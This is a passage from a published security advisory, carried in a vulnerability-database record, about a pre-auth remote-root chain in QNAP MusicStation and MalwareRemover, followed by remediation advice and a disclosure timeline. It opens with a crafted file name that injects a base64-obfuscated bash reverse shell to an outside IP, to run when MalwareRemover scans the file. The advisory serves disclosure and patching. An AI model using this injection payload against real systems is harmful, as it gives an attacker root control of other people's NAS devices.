/tmp/polict/;echo${IFS}-n${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNDIuMTE0LzgzODMgMD4mMQ==|base64${IFS}-d|bash;#\n```\n\n\n\nThe next time MalwareRemover finds and scans the such file, it will spawn a TCP reverse shell as root.\n\n#### Proof of concept\n\nThe full PoC code will be released at a later time.\n\n### Impact\n\nBy chaining both issues it\u2019s possible to gain pre-auth Remote Code Execution with root privileges on a remote QNAP NAS.\n\n### Remediation\n\nUpgrade QNAP MusicStation and MalwareRemover to the latest version available. (Note: we didn\u2019t verify the patches.)\n\n## Disclosure timeline\n\n- 28/09/2020: Submission to ZDI\u2019s portal\n- 26/10/2020: While we were waiting for ZDI\u2019s submission feedback, QNAP fixed the \u201cfile write -> rce\u201d gadget vulnerability in MalwareRemover, breaking the full chain exploit\n- 27/10/2020: polict finds an alternative gadget to achieve pre-auth remote root rce again and updates the report submitted to ZDI\n- 14/05/2021: QNAP\u2019s and ZDI\u2019s advisories are made public:\n - MusicStation:\n - https://www.qnap.com/zh-tw/security-advisory/qsa-21-08\n - https://www.zerodayinitiative.com/advisories/ZDI-21-591/\n - MalwareRemover:\n - https://www.qnap.com/zh-tw/security-advisory/qsa-21-16\n - https://www.zerodayinitiative.com/advisories/ZDI-21-592/\n- 19/05/2021: Shielder\u2019s advisory is made public\n\n## Credits\n\n- `[polict](https://twitter.com/polict_)` of Shielder\n\nThis advisory was first published on https://www.shielder.it/advisories/qnap-musicstation-malwareremover-pre-auth-remote-code-execution/\n\n **[ADVISORY](https://www.shielder.it/types/advisory)**\n\nDATE", "cvss3": {}, "published": "2021-06-01T00:00:00", "type": "seebug", "title": "QNAP Music Station/Malware Remover\u672a\u6388\u6743\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2020-36197 CVE-2020-36198\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-36197", "CVE-2020-36198"], "modified": "2021-06-01T00:00:00", "id": "SSV:99262", "href": "https://www.seebug.org/vuldb/ssvid-99262", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}]}
CVE-2020-36198
